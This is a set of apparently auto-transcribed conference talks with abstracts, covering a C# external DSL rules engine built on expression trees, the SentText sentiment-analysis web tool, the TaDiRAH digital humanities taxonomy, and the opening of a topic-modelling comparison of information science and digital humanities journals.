say func parenthesis, parenthesis, I'm actually executing the function. And now notice the string is the value is I am a string, but it's not I am a string with single quotes in it. Because the result of executing that string is a string, not a string with quotes on it. Does that make sense? It'll make more sense with something like add. So add is something like I have one plus two. And when I execute the funk right here, in this step, the result of executing the function is three, not the string three, but the number three. And just to make sure I'm not pulling any punches here, I'll run this. And yep, it passed. Now our customers aren't asking for custom calculators, they have their own calculators on their phones, calculator in Windows, all that stuff. So they don't want to calculate. They really want something to execute custom rules. When they want to execute custom rules, they want to execute them against things that were defined in their model, like in this case, it was people. They had people in their model. So they want to be able to say arbitrary rules to say if they're in this country with that age and they have this amount of, they've spent this much money in the past year on whatever, then it matches a rule and we'll go and send them a custom email for whatever, marketing email or whatever. But to do that, they had to be able to reference members on that object. And so our idea was just to have this little dollar sign to represent accessing a property in an object, but we could have done whatever we wanted. We could have had brackets, which probably would have made more sense for SQL, I guess, but in our case anyway, we just did dollar sign. Okay, so I parse it. Dollar bar is greater than five. It's actually debug this one to see what the tree pops out on the other side as. And from the other side, what we'll see is that our tree will have very special information in it. I'll go to my tree and in the root, it is a binary expression. So right away, we see that it's got a binary expression there to represent the logical operator of a greater than. And inside it, it's got root, AST node. It's the greater than operator. And notice it has left, operate and right. And that's because we define that custom node that represented left operator right. The left side, it says it's an object property. And the right side, it says the number five. So I can dig in the left. I can see here the node is the variable name is bar. So I've defined a custom node that represents an object property. And part of that, I've said, also be able to get out the variable name I am accessing, or I guess it's really the property name. And in this case, it's bar. So I've got a tree that defines whatever it is that result of parsing that, the binary node of the greater than, the left hand side, which is the dollar bar, and the right hand side being a number. And what I want to do is build a function out of that that says I can dynamically execute it against any, in this case, any foo object. And foo is a class up here that has, where is foo? I heard this. Foo is just a class that has a property called bar. Highly inventive, I know. And as part of this, we have two properties. We are two instances, one that's invalid and one that's valid. So one that's invalid in my rule of bar is greater than five. The bar is four. And the other one where it's valid, it says bar equals six. So now it is valid. And now I can execute that same function against both versions, invalid and valid. And for the invalid one, it's false. And for the valid one, it's true. The same exact function, so I'm not recompiling or anything like that. I'm not going through any fancy text C sharp compiler or anything like that going on here. It's just taking my tree and building out something else on the other side, this C sharp expression tree. The same function executed twice, two different results based on whatever object I passed into it. So really the magic here is I can pretty easily build a tree of things, but it's another thing to say, okay, now taking that tree that we're looking at, now go build dynamic executable code from that. And so that part is depending on what language platform you're using is easier harder than others. In Ruby, it's easier. In Java, I have no idea. In C sharp, it's possible in most cases, but hopefully it's going to be easier. I think they're giving a talk today as well in Rosalind, which is a dynamic compiler helper tool that Microsoft is putting out. So depending on your language, it can be easier or harder to do. Anyone here a Ruby guy? Anyone here of cucumber? So it uses a very similar concept of you parse the tool, you parse the text, it gets into some intermediate format, and then I use that to actually be able to execute code based off what you've defined there. It's a very similar concept. Okay. So in C sharp, if I want to be able to dynamically create custom functions on the fly, I have a few options to go there. Some are harder and some are easier. Actually, they're all pretty hard and annoying, but some are more annoying than others. So the hardest way would just be to say, let me see if I can just get that text I put in there and somehow compile it into C sharp. Load up the C sharp compiler and just compile it. But in this case, I don't have a whole program. I just have a little snippet of text. There's no class, there's no method. So it's really hard for me to use the C sharp compiler to do so because, hey, it's not a full valid C sharp program. It's just a single small tiny expression. Part of what C sharp introduced with link, the language integrated query, was the ability to build out expression trees. So the whole thing of from, where, select, all that stuff that came in C sharp 3, that required the use to be able to take that, what looked like SQL text and be able to parse it into what's known as an expression tree. And so that's exactly what we're going to be using here. I don't think it was necessarily intended for this use, but people just grabbed a hold of it and started using it for this. Be able to dynamically build custom functions. So I could, for example, on the fly, put less than in there, and now it'll be backwards. So the test will no longer pass because, hey, what was invalid is now valid. So this one doesn't pass anymore. But it's not doing any code generator things like that to be able to do this. And instead, behind the scenes, it's building up expression trees. And this is probably the most obtuse part of the whole code base, just because expression trees are very obtused. If you want to build an expression tree in C sharp, you basically start out with this expression object, the expression class, and on top of it, it has a number of methods to help build out nodes in an expression tree. So you see here, there's just a bunch of them defined. This is only part of the A's. And there's quite a few defined here. I've got add, add a sign, add checked, and then I have logical ones, and also, legacy of the VB days is, and also is different than and, by the way, because one short circuits and one does not. If anyone here knows VB, they'll know what I'm talking about. Or if you don't, you really should check it out. I have things like array access and array index, and all these represent some kind of operation I can do in C sharp. And these are all just factory methods, building up these expression objects. Each node is just this expression object I can do something with. One of the things they also have the ability to do is take these expression trees that build up and then from that dynamically compile a function. So down here, I define that part of this is going to be an expression that represents a lambda that is a funk of something getting put in and then an object being pulled out. So a lambda that represents this. This is equivalent to saying, so I could have funk, funk, T, object, and then it takes in some T guy. T goes to, I don't know, bar. So this is just a function that I can execute right away. Well, C sharp has the ability as well to create these expression trees. So if I change this to expression of funk, well, now instead of being a anonymous delegate in line and spread when this gets compiled, it's actually just a tree of objects being created. And if I want to actually execute this function at runtime, what I have to do at this point is say, foo.compile. And then this actually returns now a funk that I can then use. So at this point, I can say compile.execute against some T object and do something with it. And so that's all we're doing here is we're taking our tree that was built up by the Lexar parser and turning it into a C sharp expression tree, which then we can compile and then execute. In this case, I have a try catch around it to any exception being returned, it just returns the exception. So this is the real magic step. It goes down and builds out based on the root node, goes and builds out based on all the different nodes I have in my system, and goes and translate those into the X will C sharp expression tree nodes for each kind of node. For example, a nil node, which was null, is going to be the expression that constant node for null. A Boolean node is going to be expression.constant for whatever Boolean value we have. Same thing with dates, expression.constant, the date value. And we just go on. Functions are a little bit funny. We can call, there's ways and expression trees to call custom functions. But all we're doing here is because we have a tree on the left, we can build a tree on the right. So we just recursively walk down one tree, build up another one. And at the very end, we have something we can then say, okay, we're done. Compile it. And now I got something to work with. So now my final application, the way this looks like now. I parse my tree, just the raw text, and never turns me a tree back. I have some very simple, you know, if I have errors, then go ahead and say, oh, you have errors, blah, blah, blah. I then pull up that root node and instantiate my builder and say, okay, build me a function that I can then go execute that takes in a person, returns an object, and is dynamically compiled based on whatever text I had for whatever the user typed in. Now that function I can execute directly. So I can say, func, pass in a person object. And the result now is going to be some Boolean value that I can say, if it's a match, do this. If not, do the other thing. And so, still have it running. There we go. So that's how we have this very dynamic behavior. So I can say, first name is this, or last name equals do. Now, this one right now may evaluate to match just because the order of operations isn't correct. So we may want to say, well, age is greater than five and these other two guys. And now if I say John Smith, this will evaluate to match but without the parentheses, of course. Oh, wait. How about Jane? Jane Doe. That makes more sense. Age greater than five. And first name is John. Oh, so the and gets executed first and then the other one's executed. So, yes. That makes sense. So the user can type in any arbitrary expression here. It doesn't matter how complex it is. If I want to put in 50,000 parentheses on one side and 50,000 on the other side, it's able to handle that just fine. Any complexity inside there they want, they can have that now. Where if I had to design a user interface again behind this, it would just be the ugliest user interface ever. And I've seen people try to do that and it's just never come out well. So if I have to, if I want to be able to have the user just type in anything, the text is the right way to go, then building an external DSL to be able to parse it, take it and execute it is really the only option that can have that will please the end user. And also give me something in the side that I can actually maintain. So if you want more information on domain specific languages, couple really good resources that I highly recommend. The one on the left is a generic about domain specific languages by Martin Fowler and Rebecca Parsons. And this talks about the patterns of domain specific languages like internal ones, external ones, the different patterns you find in there, the different terms and things like that. But it doesn't really tell you how to build something. So that's what I use the other one for. The antler reference is also a really good one. About the first half of the book, it's really good about just describing, you know, these are the kind of things that you need to worry about if you're designing something that needs to be parsed. And then the second half of the book is okay, and here's how you do with antler. So if you want to use antler, great book, if you don't want to use it, also great book, just stop reading about halfway through. So with our external DSLs, we were able to get the awesome user experience to the end user, they can type in whatever they want, they're able to get Excel, they can do calculators and things like that. We didn't have to design some crazy user interface to be able to have them drag and drop operators and things like that. They got the raw text they wanted to. And we were able to fulfill that inevitability that any enterprise system eventually will have a rules engine. So we were able to have our custom rules engine by using external DSLs to allow the user to type in whatever they want and have it execute dynamic C-sharp or SQL code on the other side. So if you all have any questions, we'll be hanging around afterwards. Otherwise, thank you very much. Thank you. Thank you.
We've all seen the explosion of fluent interfaces and internal DSLs with the language-oriented features of recent releases of C#. Dynamic languages extend the boundaries even further, where we can bend the programming languages to our will. But what if we want to move beyond the barriers of the programming language and into actual external, executable DSLs? In this session, we'll look at the landscape of lexers, parsers, grammars and trees to see how we can use these tools to build external DSLs that business users will actually enjoy using. We'll also look at how we can take those trees and transform them into real, executable code. Finally, we'll see where to use external DSLs (and where not to use them) to build systems with truly dynamic behavior.
10.5446/52968 (DOI)
I hope everyone sees my slide. I will gently switch to English as you hear. Do you see my slides? Okay. So, my name is Thomas Schmidt from the Media Informatics Group of the University of Regensburg and I will present Cent text at Tugel for Lexicon based sentiment analysis in digital humanities. As already was said, Johanna Dangell was the primary developer of this tool, Christian Wojty, the supervisor of diseases that's connected to this tool development. And yes, this is a theme, this is originally a demo slash short paper contribution. So I will talk a little bit about background and how we approach this tool development, but I will mainly focus on showing the tool and by using it. So I will start with a little bit of background about sentiment analysis. Here you see just a standard definition of sentiment analysis. Also called opinion mining, the field of study that analyzes people's opinions, sentiments, appraisals, attitudes and emotions, mostly in written text. Overall the idea of sentiment analysis is to try to predict the sentiment, express sentiment in a text unit, if it's rather positive or rather negative, if it's rather neutral or something like mixed. And that's the basic premise of this method. And it has become a rather popular method in recent years in the text mining community and information science in general and is applied in various research areas like social media analysis, analysis of product reviews, sentiment analysis on Twitter into a similar and research branches. If you would approach sentiment analysis nowadays, the state of the art idea would probably be to use some sort of large pre-annotated corpus about sentiment annotations. For example, you want to do Twitter sentiment analysis. There are a lot of large Twitter corpora with annotated sentiment per tweet. You would use these as training corpus and then perform some machine learning algorithm to train a model, probably nowadays with something like a large word embedding like bird or similar stuff. Of course, not every topic and not every research area has large chunks of annotated corpora. And of course, especially nowadays, the modern machine learning approaches are not that transparent and as other methods. So there's also another very popular, still very popular method, which is a little bit more simpler, which are lexicon based methods. And this is also what is still kind of popular in the DH community due to some sort of lack of annotated corpora, although there are developments that are going more into the direction of machine learning. Shortly about lexicon based approaches and sentiment analysis, because this is the main idea of our tool, it's a rather simple concept. Instead of having a pre-annotated corpus, you have a pre-annotated list of words, so-called sentiment bearing words, which are annotated concerning the sentiment polarity. So if a word is rather positive or negative in the general usage of this word, and this can be a number from like one or minus one, or it can be some metric scale, and you use these lists, which are created in various forms, sometimes expert based, sometimes by some sort of semi-automatic process. And then you perform rather trivial calculations for a text unit. Here's just a very simple example. You simply count the words you detect as positive, you count the words you detect as negative, and then you perform some basic mathematical calculations to get an overall value of the polarity, the expressed valence of the text. Of course, there are some approaches to perform this more sophisticated. You can try to look at negation words. You can try to look at valence intensifiers. You can perform limitization to improve this. But the overall premise is a basic calculation of the words detected in the text. As I already mentioned, due to the lack of corpora, and because it's very transparent also and very easy to perform, for a long time in DH context, lexicon based approaches, where the approach is to use when performing sentiment analysis. But some example what people are doing, they are, for example, looking at the most negative or the negative sentiment words used in plays by Shakespeare, for example, here in Humblett. They look at relationships between characters. This is a graph that visualizes the accumulated sentiment and speeches expressed by a specific character in a Shakespeare play, or tello towards the Stemona. You can see in the visualization that the accumulated sentiment becomes more and more negative, which is in line with the real content of this play. And similar stuff was also explored in various other areas that are close to digital humanities, like literary studies, but also for historical language and other research areas. The ideas are the same. We also contributed to this branch of research. We explored lexicon based sentiment analysis for another tool we developed for quantitative drama analysis, which I will shamelessly plug in here. In this specific case, we performed lexicon based sentiment analysis on place of lessing, and we evaluated approaches, and we explored visualizations. We developed a web tool to explore sentiment analysis in lessing's place. A tool that performs analysis like this and produces visualizations like this. This is, for example, a bar graph visualizing how the sentiment becomes more and more negative in a play from lessing. This is something you can identify in all of this plays. And we developed a lot of visualizations for this method. But as we did this and as more users used the tool and gave us feedback on what is interesting and so on, the feedback we received was more and more towards the idea that people wanted to perform their own lexicon based sentiment analysis. And people also wanted to have more transparency about how these results actually came to existence. So we saw a lack of tool existence in this context, and we decided to actually develop such a tool that people could use to perform their own lexicon based sentiment analysis. And the idea was to focus primarily on the DH community. We wanted to make it as accessible as possible. My impression is that tools that need a lot of installation, need a lot of dependencies are not used that frequently. And then tools that are more accessible like web tools. And we also wanted to give some transparency in the context of how calculations came to existence. We also applied some methods of the user-centered design process. We performed a requirements analysis. We integrated methods of usability engineering. For example, we performed interviews with a couple of people from the DH context, but also from literary scholars. We performed some usability tests to gain feedback and to develop a tool that is as adapted to the specific community we are designing it for as possible. I will not go into detail of all of these methods since I really want to show the tool. Just some of the requirements we acquired via this process are shown here. As I already said, people wanted to primarily use their own material. They wanted to adjust lexicons. As you can imagine, text sorts in DH are not really contemporary language. It's most of the time historical language or other specific domains, specific language. And people wanted to adjust this. They wanted transparent results. Since the web is not that... And the web is seen as a very accessible platform to use, which of course causes also a lot of problems. But this is the idea we followed here. So I summarized some of the overall functionality. We do perform some advanced stuff with our tool like limitations and negations. Right now everything is focused on German, but we plan to extend this also on other languages. But instead of talking about the functionality, I will actually show the tool with a live demo. And it will actually be also the first time that I explored this specific text. So as you already know, in IT, there can go nothing wrong with a live demo. So let's look at the tool. So I hope you all see my browser now. Can you give me short feedback? Okay. So this is the start page of 10 text. We integrated a lot of documentation and explanation as we already made the experience that people are very interested in all of this. And where we explain the different pre-processing steps, what types of data you can upload, what you can download, and so on. If you go to the sentiment analysis branch of this tool, you then can indeed upload your files and perform sentiment analysis. You offer some basic German sentiment lexicon, but there's also a possibility to upload your own lexicon if you follow a specific data standard, a rather simple standard, and that you can read more about in our documentation of the tool. From the advanced options, as I already said, we can perform limitization with a German limitizer, and the process is very time consuming. Again, since we are in the web, everything performance is a thing, so to speak, but you can also, you also have some other adjustment possibilities like stop words list and to use negations as well and shifters and so on. So I looked for an interesting example where I hope that I find some interesting results for state of the art research, so to speak, and what we will do, we will compare German rep lyrics with German Schlager lyrics. I looked a lot for the English word of Schlager, but I didn't find anything. It seems to be German Schlager. And I will prepare sentiment analysis. This might take a little time, so I of course prepared this beforehand just to give you an insight how this looks. This corpus is basically a list of lyrics from various artists of the specific rep or Schlager genre. I don't know much about rep, but maybe I have some artists, yes, some well-known German artists of Schlager. Not super representative, but of course I just want to show how the tool is applied. So please don't, this is not about German lyrics or something like this. Nevertheless, if you perform the analysis, what you get is a screen like this. On the left screen, in this specific case, the entire corpus of rep lyrics and the entire corpus Schlager lyrics are seen as one document, so to speak. So we just compare one document to each other. You can of course import more documents and then create so-called folders to compare document collections to each other. We will just focus on this one type. We currently look at the Schlager results. You get a normalized score. It's always very small, since it is normalized by the numbers of tokens, which helps to compare documents of different sizes. But nevertheless, the overall impression is indeed that the Schlager texts do look actually less negative than the rep texts, although the difference is quite small. You produce some visualizations that you can look for. For example, a pie chart of the negative detected words and the positive detected words. You can look at the strongest sentiment bearing words. This is just for Schlager in this example. So these are the very positive words that are most frequently used for Schlager. These are the most negative words that are used for Schlager. The word Hölle, I think this is very specific song that is the reason for this result here. And you can explore other analysis. We also try to connect a little bit of closed reading, which is actually something that we found out that users really like to explore how the sentiment analysis actually works. In the right text, you can explore your document and look at the specific words that are detected and what sentiment value they actually have. So this is actually the part where people oftentimes go into and look at, okay, a wrong word was detected. This word shouldn't be positive and so on. There are some words that sounds and sound intuitive. I was looking a bit for an example where negation comes to play, but I'm not sure if I can find one off the top of my head. So if a negation word is close to a sentiment bearing word, the valence gets thrown into the other polarity. Yes, but this is something that people actually quite like. You can also compare documents with each other. In this case, we would compare Rep to Schlager, for example. For example, if I want to compare the most negative words in Schlager and the most negative words in Rep, you can look at something like this and then you can get an overall impression of what is happening and I would argue that some of the results here are already telling of the specific genre. Of course, you can also look at this from a more quantitative standpoint of the specific word distribution. You would see here, indeed, there are more negative words, 46 percent than in Schlager, which is apparently a bit more positive according to the specific methods and all the limitations that are connected to this specific method. Yes, so I have all the links in my presentation. I will later on also share the presentation. Of course, you also find all the links to the tool and so on on the specific paper to explore the tool. That's always the most fun with tools to explore them better yourself. From my standpoint, we also performed a usability test. I will try to go back to the slides here. I hope you all see now my slides again. It was a rather small usability test, but the feedback was rather positive with very good results. Of course, we had some sort of iterative development sort of tool was constantly tried to improve. Overall, there are still a lot of missing features. Other than that, I'm rather glad the tool exists. It seems to be used rather often. I have a lot of my access numbers are surprisingly high. I don't know how these people always find the tool and every now and then I receive some mails and what people still would like the most is of course more lexicals and more languages. Could you integrate something for Spanish and so on? This is something to do. Of course, some sort of user management. Right now, everything is more or less, it's more or less, we basically saved nothing from a user. We don't even save the text, so you can save your overall dashboard. You can save the PNGs and you can download some tables with the results. You can download an XML with your results, but you can't save your entire process, so to speak. Overall, since I'm also doing sentiment analysis with other methods, I would say that if you really want to do a very scientific research project performing lexicon-based sentiment analysis, you usually need more control than this tool can offer, but I still think that this tool has its value. Nevertheless, you can explore a text sort, get first results, get first insights, get a first understanding of your specific text that might be problematic. I also think this tool is very nice to use for education purposes, just to show the tool to students to explore sentiment analysis and its method of law to clean. If you want to have more information, the good friends of Fortex created a very large tutorial for the tool that I can recommend if you want to get to know more. And other than this, I thank you for all your attention. I thank for Johanna for the great tool. Her contact data is also here. I hope you had some fun with the talk. Thank you very much.
We present SentText, a web-based tool to perform and explore lexicon-based sentiment analysis on texts, specifically developed for the Digital Humanities (DH) community. The tool was developed integrating ideas of the user centered design process and we gathered requirements via semi-structured interviews. The tool offers the functionality to perform sentiment analysis with predefined sentiment lexicons or self-adjusted lexicons. Users can explore results of sentiment analysis via various visualizations like bar or pie charts and word clouds. It is also possible to analyze and compare collections of documents. Furthermore, we have added a close reading function enabling researchers to examine the applicability of sentiment lexicons for specific text sorts. We report upon the first usability tests with positive results. We argue that the tool is beneficial to explore lexicon-based sentiment analysis in the DH but can also be integrated in DH-teaching.
10.5446/52969 (DOI)
Thanks for the nice introduction and thanks for having us. So in today's talk, we would like to provide some insights on the origins and the development of a taxonomy of research activities in the digital humanities called TADERA. This is a cross-disciplinary case study of a collaborative initiative of information organization and access to the digital humanities. It includes insights on a far-reaching revision and formalization of the taxonomy. So to give you an idea of what the revision was about, we will first take a look at the research landscape at the time and the context in which the taxonomy was created. So the starting points of TADERA version one. We then turn to the innovations of version two, in particular, its conceptualization, and discussion, publication, revisions, and take a look at future tasks. Finally, we will try to deduce a few more general remarks from our case study. So version one. The taxonomy that we built to help categorize digital humanities is called TADERA, which is a portmanteau blending of taxonomy of digital research activities in the humanities. At the same time, the name reflects the acronyms of the initiatives that taxonomy evolved from. You'll see that on the next slide. We did not have to build it up from scratch entirely. There was an ongoing interest in what the DHR that built on some more generic thoughts, like unsworthiness, scholarly primitives that have already been mentioned this morning, or the methodological comments. However, while those reflect the interdisciplinarity of digital humanities, it was a rather general effort of theoretical considerations. It was like 10 years later that artshumanities.net, maybe some of you still know it, at King's College provided a more structured approach for the DH domain. And that is where TADERA could carry on and expand the available data into a taxonomy. So TADERA resulted from a joint effort of several research projects at the time that had similar interests to the categories available data. While the DEMA, the network for digital methods and humanities, followed a very theoretical approach as well to build a far-reaching authority, DERR, DERD, and DH Commons had very practical use cases, where bibliographical data, research tools, and research projects were to be categorized and made available online. Therefore, it may tend to form a transatlantic and interdisciplinary alliance to build a taxonomy together. While TADERA is rooted in those projects, it never had a funding of its own. The taxonomies' original aims are still valid today. It is designed to organize and categorize the H content that follows a pragmatic approach, rather than aiming for completeness and perfection, in order to make it usable for a wide range of disciplines that operate digitally. At the same time, the deliberate, pragmatic, and practical approach enables an ongoing development and participation of the community. TADERA also set out to make visible the activities of a field that, of course, was not new, but that had by then built some discipline-like structures in terms of scientific and or political relevance and visibility. Let me give you a brief example of community engagement when designing the original taxonomy. So this is almost a bit of oral history here. This is from the first suggestion that we shared with the community to get feedback from all kinds of digital humanities scholars from various disciplines. We used a simple Google doc that was open for everyone to comment. You can see the screenshot on the right, even though you can't read it. You see there's a lot of comments there. And we received all those suggestions on terminology and the scope notes. There's a little magnified selection on the left of the slide. So those then served as an input for another round of revisions that kept us busy for a while. To give you an impression of the first result, I would like to give you a very short overview. There are seven top-level activities that somehow still reflect the order of a research cycle, capture, creation, enrichment, analysis, interpretation, storage, and dissemination, each of them having a set of various methods. Can't read it. I have a little bit of an example here. In the case of our research activity capture, there will be conversion, data recognition, discovering, gathering, and some more. Both the top level and the methods listed beneath them come with scope notes. In addition, there were two loose lists of research activities and research objects that could be associated with the methods used. However, as you may have understood by now, a lot of organization had gone into the process by this time. But it did not actually deserve the name of a taxonomy or controlled vocabulary. Until then, it was useful in terms of a critical review of then used the age terminology. But the result did not enable much more than a hierarchical key word. So this is where I hand over to Janan, who will give you some insights on what we did in version 2 to overcome the state. Thank you, Louisa. So while Tadira spread over the years, its application did not go, as Louisa just already told, beyond the key warning. So this was both a blessing and an escape. Finding and accessing resources was possible. But Tadira version 1 could not meet the objective of establishing interoperability or reuse in the sense of the fair principles. In order to eliminate the vagueness and to optimize the use for the growing D age, the need arose to revise and harmonize the structure and the semantics of the model. This includes the terms and the definitions related to research activities and techniques, and also expanding the model on the basis of community usage. In order to create a consistent and coherent conceptualization as the basis for further formalization, one of the main tasks was to define criteria for top and sub-concept descriptions. These scope nodes should not be too narrow or too broad, should contain no or an explicit delimitation to other terms, should not contain any contradictions or negative definitions, should not include several definitions within a scope, and should avoid redundancies with other definitions and unnecessary references. Finally, the concept terms should be written consistently in lower case letters and as Gerendiva. So the harmonization of the existing conceptualization was supplemented by model expansion based again on community engagement like the evaluation and aggregation of existing implementations, such as TAPOR or Claria DE, and these so-called new aggregated concepts were further enriched with external VikiData definitions. So at Tadira Info, you can find an interactive visualization of the new Tadira version 2 model. Besides the redesign of Tadira, the new version 2 was transformed, formalized, and implemented in standardized SCOS. Simple knowledge organization system is developed specifically for the representation of data of controlled vocabulary and taxonomies. Just to give you some few examples right now, as a formal language based on RDF, concepts are represented in a hierarchy here, each with a unique identifier and assigned to multilingual labels, but also a mapping to version 2. Information about the meaning of a resource is held by the properties SCOS Scope Note or SCOS Definition. And these two properties serve to distinguish the self-written scope notes from the external VikiData definitions. Version 2 is since summer 2020, permanently published on the Daria EU Vocab Server. And this service is operated by the Austrian Center of Digital Humanities and Cultural Heritage of the Austrian Academy of Sciences, one of the partners in the Claria Consortium. The open source software SCOSMOS is used for display and search, and the software works natively in a triple store database providing a sparkle endpoint. The RDF export of the vocabulary can be downloaded in a turtle format due to the licensing of Tadira vocabulary under the CCO public domain license. Let me now summarize some major revisions. So version 2 represents an extended and refined model on the basis of the community usage, includes revised scope notes and links to VikiData definitions. Includes also translations and concept level in German, French, Spanish, Portuguese, Serbian, and Italian, and maybe in future also in Japanese or Norwegian. It is standardized SCOSM and published open source under a CCO public domain license. So coming to our outlook. Version 1 was developed on the basis of a hermeneutic and iterative approach that was discussed intensively with the community. For this reason, we expect continuous model development, for example, regarding the revision of multilingual terminology and scope notes of the version 1. The communities also invited to further develop the model in terms of content and structure. We expect an ongoing conceptualization and multilingual transformation of research objects. We also expect admission and specification of highly relevant VikiData definitions as core scope notes. And for this purpose, an approach was developed, which through the link with VikiData enables missing definitions to be added and ideally to convert them iteratively into high quality scope notes. In addition, our workflows for maintenance, development, and quality management are also based exclusively on the community engagement and commitment. A Tadira board will be responsible in future for process management. And this board consists of original core team, new developers, and other contributors. Just let's have a final look to what experiences we have distilled from this case study. The concept-oriented character of SCOS enables the structuring of generic hierarchies. Because of this, searching and indexing related use cases are perfectly compatible. However, a representation of a higher granularity and more complex semantics is not really possible with SCOS. Of course, it would have been possible to design a higher level of formalization. However, this again would not really be appropriate for the addressed application goal. Based on a practice-oriented usage scenario and limited by the few available resources, a pragmatic approach was therefore pursued in which a consistent vocabulary developed as a small common denominator, which limits the general scope note for interpretation without losing semantics. The interdisciplinary project work required fruitful but constant negotiation with one another. Low threshold modeling dynamic community involvements are essential for increased use, reuse, and acceptance. And with fair basic strategies for data-driven research and teaching, as well as optimal processing for research data are defined. The assessment of whether the fair principles are met or not always depends on the context in which Tadira is involved. So while the principles can be fully adhered in a research system, they can no longer be adequately fulfilled in interaction with others. Practical research use value is increased through standardization and the associated greatest possible infrastructural connectivity. And the two platforms, Vocabs and Tadira Info, offer user-friendly searchability, retrievability, and sightability. So we remain true to the original principle and just keep it pragmatic. Thanks for your attention.
Classifying and categorizing the activities that comprise the digital humanities (DH) has been a longstanding area of interest for many practitioners in this field, fueled by ongoing attempts to define the field both within the academic and public sphere. Several European initiatives are currently shaping advanced research infrastructures that would benefit from an implementation of a suiting taxonomy. Therefore, new humanities and information science collaborations have been formed to provide a service that meets their needs. This working paper presents the transformation of the Taxonomy of Digital Research Activities in the Humanities (TaDiRAH) in order to make it machine-readable and become a formalized taxonomy. This includes the methodology and realization containing a complete revision of the original version, decisions in modelling, the implementation as well as organization of ongoing and future tasks. TaDiRAH addresses a wide range of humanities disciplines and integrates application areas from philologies as well as epigraphy, and musicology to name just a few. For this reason, the decision in favor of SKOS was made purely pragmatically in terms of technology, concept and domains. New language versions can now be easily integrated and low-threshold term extensions can be carried out via Wikidata. The new TaDiRAH not only represents a knowledge organization system (KOS) which has recently been released as version 2.0. According to the FAIR principles this new version improves the Findability, Accessibility, Interoperability, and Reuse of research data and digital assets in the digital humanities.
10.5446/52971 (DOI)
Hello, this is Manuel and Jan from the Computational Humanities Group at Leipzig University and we are delighted to present our ongoing research at ISI 2021. Our paper title is A Bit of a Monster, so just let me summarize it in the following way. We are interested in the disciplinary relationship of information science and digital humanities and the method we use for our study is rooted in scientometrics as we compare a large core purpose of academic journals from both disciplines. We investigate the relationships on the level of shared topics which we identified using LDA in combination with a hierarchical clustering approach which leads to an improved topic quality. All right, so to get started let me remind you of the conference theme of this year's ISI which says information science and its neighbors from data science to digital humanities. This already indicates that there seems to be some kind of relationship between information science and digital humanities. And indeed this relationship has been discussed extensively before. At ISI 2015 for example, Lin Robinson and others discussed if library and information science and the digital humanities might have a joint future as there are obviously many connecting factors between both fields. Roberto Boussa, a famous name in the digital humanities was also one of the first to highlight the documentaristic current of digital humanities and he stresses that information infrastructure was an important focus in the digital humanities from its very beginnings. Others have conducted scientometric studies to reveal that many authors of the age journals and conference publications are actually people that are coming from information science. So at this point one might say many information scientists simply have widened their scope and have emigrated into the unexpored country that is digital humanities. And to be honest that is exactly what happened to me. I finished my PhD a couple of years ago in information science in Regensburg actually and I have emigrated to Leipzig to become a professor of digital humanities a few years later. So in retrospect this personal evolution of mine does not seem that unlikely if we look at these recent statistics on the development of professorships in both information science and digital humanities in Germany one must add. So here we certainly see a difference between the two disciplines information science and digital humanities. So you see in the last 10 years they have been 22 new professorships in the digital humanities while information science is more or less stagnating and has increased only by half a position. Looking at the number of places where digital humanities has been institutionalized we find an increase by 16 new places while information science on the other hand has been reduced from 7 to 5 so they have lost two places. So seeing these sheer numbers of how the two disciplines have developed in the last 10 years suddenly this whole information science and digital humanities are more or less the same gets a whole different flavor because this is certainly not reflected in these numbers that strongly favor digital humanities over information science. And honestly if digital humanities and information science are largely the same but all the money goes to the DH instead of information science there should be some resistance against the new kid DH from the side of information science. And indeed we also find many critical voices for example Glatney who compares various definitions of information science and DH and comes to the conclusion that DH actually is nothing but an unneeded invention. So there's nothing new that has been done by information science before and DH is basically just there to steal money from information science. So while I personally like the friendly neighborhood metaphor that this year's ISI theme conveys I also believe it is crucial to distinguish the two disciplines from each other. And this is also important not only from an IS perspective but also from a DH perspective where I personally as a DH professor struggle with the big tent metaphor that is often used in DH and that deliberately blurs the boundaries of digital humanities as a discipline in its own right as it invites anybody to join the big tent DH. Again this is a very diplomatic metaphor just opening a big tent but its negative implications have been summarized very well by Melissa Terrace in the following way. She says if everyone is a digital humanist then no one is really a digital humanist. The field does not exist if it is all pervasive too widely spread or ill defined. And Terrace also highlights that the big tent metaphor entails or may entail a crisis of inclusion that makes it very hard to distinguish digital humanities from other disciplines like for example information science. Well, I hope by now it has become clear why information science and digital humanities despite all the synergies and similarities and overlaps should have an equal interest in clearly distinguishing themselves as scientific disciplines. And that is basically the motivation for this study for this paper and we present a scientific study in which we compare the two disciplines to each other in order to identify unique scholarly practices and characteristics and research topics that allow us to distinguish information science and digital humanities from each other. It should be noted that a number of scientific studies have been done before but none of them has explicitly investigated the relationship to information science and none of them so far has relied on topic modeling as an approach. So yeah, here we are presenting a scientific comparison of academic journals from both information science and digital humanities using LDA topic modeling in a combination with hierarchical clustering and this is where I hand it over to Jan who will present some more details on the corpus construction and our take on LDA for this specific task here. Hi everyone, my name is Jan and I will give you a quick overview of our methodology. For our study we designed a corpus of research articles published between 1990 and 2019 in five selected journals. For information science we selected the Journal of Documentation and JASIST. For the digital humanities we selected Computers and the Humanities which in 2005 was renamed to Language Resources and Apparition. Literary and Linguistic Computing which was renamed to Digital Scholarship in the Humanities in 2015 and Digital Humanities Quarterly which was first issued in 2007. We considered these to be well established and sample journals of the two fields. However, we must be aware that they represent only a small part of the international research discourse in the fields so our study is totally biased towards US and Western European research. Also these selected DH journals tend toward linguistic and literary research so other areas of the digital humanities such as digital history, musicology or geography may be underrepresented in our study. We retrieved all published articles available to us without any specific query or pre-filter. They were obtained as PDF files via the Crossref API and via Oxford Academic. Digital humanities quarterly articles were retrieved via the website STIXMR. All in all these amount to 6498 articles consisting of approximately 43 million tokens. If we look at the number of articles per year in journal we can clearly see that there are many more articles from JASIST than from the other journals. Also the amount of articles in the 2010 decade is much higher than in the 1990s. To ensure a balanced impact of decades, disciplines and journals on the topic model we performed topic modeling on stratified sub-samples of the corpus. I will come back to this in a moment. Our PDF files were converted to TIXML using the tool Grobit. From these XMLs we extracted the full texts of articles. These were then tokenized, lower-case, part of speech tagged and lemmatized using Spacey. We chose to perform topic modeling exclusively on nouns and proper nouns for reasons of efficiency. We also chose to extract and concatenate collocations using a normalized point-wise mutual information threshold. These were filtered to contain at least one noun or proper noun which resulted mostly in terminal logic and noun phrases. Finally, all terms which occurred in less than one percent of articles were filtered out resulting in approximately 6700 feature terms. For topic modeling we relied on a widely used implementation of latent Dirichlet allocation or LDA in the Java framework method. One of the major pitfalls of LDA in topic modeling in general is the unreliability of its results. We therefore adapted a workflow of aggregating multiple results of LDA into one 